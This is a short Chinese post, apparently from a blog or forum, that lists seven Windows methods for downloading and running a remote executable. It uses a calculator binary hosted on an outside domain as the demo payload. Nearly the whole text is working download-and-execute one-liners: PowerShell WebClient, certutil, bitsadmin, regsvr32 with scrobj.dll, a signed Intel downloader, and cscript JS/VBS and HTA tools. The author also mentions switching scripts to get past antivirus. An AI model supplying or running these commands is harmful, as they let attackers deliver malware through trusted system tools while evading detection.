我用了一个计算器做示例：

http://haiyangtop.cn/calc.exe

1、powershell (new-object System.Net.WebClient).DownloadFile('http://haiyangtop.cn/calc.exe','d:\down\calc.exe');start-process 'd:\down\calc.exe'

2、certutil -urlcache -split -f http://haiyangtop.cn/calc.exe d:\down\a.exe&&d:\down\a.exe

3、bitsadmin /transfer n http://haiyangtop.cn/calc.exe d:\down\a.exe && d:\down\a.exe

使用bitsadmin的下载速度较慢

4、regsvr32 /u /s /i:down.sct scrobj.dll

5、带有intel公司签名的下载者。

GfxDownloadWrapper.exe http://haiyangtop.cn/calc.exe d:\down\a.exe

6、vbs被杀得太厉害了，换个js写法，原理一样。

cscript d.js http://haiyangtop.cn/calc.exe d:\down\calc.exe



7、很早前我就写好工具了，用管理员权限打开xmldown.hta
cscript vbsdown.vbs http://haiyangtop.cn/down.xml d:\down\xml.exe